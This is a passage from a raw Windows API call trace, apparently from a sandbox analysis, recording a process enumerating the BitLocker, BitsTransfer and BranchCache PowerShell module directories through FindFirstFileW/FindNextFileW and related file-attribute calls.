ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5928b0 [0176.822] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.822] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.822] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0176.822] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0176.823] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0176.823] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0176.823] FindNextFileW (in: hFindFile=0x1a5928b0, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 0 [0176.823] FindClose (in: hFindFile=0x1a5928b0 | out: hFindFile=0x1a5928b0) returned 1 [0176.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.824] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1")) returned 0x20 [0176.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.827] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0176.827] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0176.827] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.828] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.828] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.828] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0176.829] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0176.829] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0176.829] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.829] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0176.829] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0176.829] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592910 [0176.830] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.830] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.830] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0176.830] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0176.830] FindNextFileW (in: hFindFile=0x1a592910, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.830] FindClose (in: hFindFile=0x1a592910 | out: hFindFile=0x1a592910) returned 1 [0176.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.831] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0176.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.831] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0176.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.831] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0176.831] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\", lpFilePart=0x0) returned 0x40 [0176.831] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0176.831] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.832] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39be, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0176.832] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0176.832] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0176.832] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0176.832] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0176.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.832] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0176.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.834] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache", lpFilePart=0x0) returned 0x3e [0176.834] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\", lpFilePart=0x0) returned 0x3f [0176.834] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.836] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.836] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9edf50, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9edf50, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x6c4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.format.ps1xml", cAlternateFileName="")) returned 1 [0176.836] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.psd1", cAlternateFileName="")) returned 1 [0176.836] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x141e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache.types.ps1xml", cAlternateFileName="")) returned 1 [0176.836] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheClientSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.837] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheContentServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.837] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheHostedCacheServerSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.837] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37740fa9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37740fa9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37740fa9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheNetworkSettingData.cdxml", cAlternateFileName="")) returned 1 [0176.837] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9555ec, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x5f9555ec, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x8a64, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCacheOrchestrator.cdxml", cAlternateFileName="")) returned 1 [0176.837] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x197, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCachePrimaryPublicationCacheFile.cdxml", cAlternateFileName="")) returned 1 [0176.838] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, 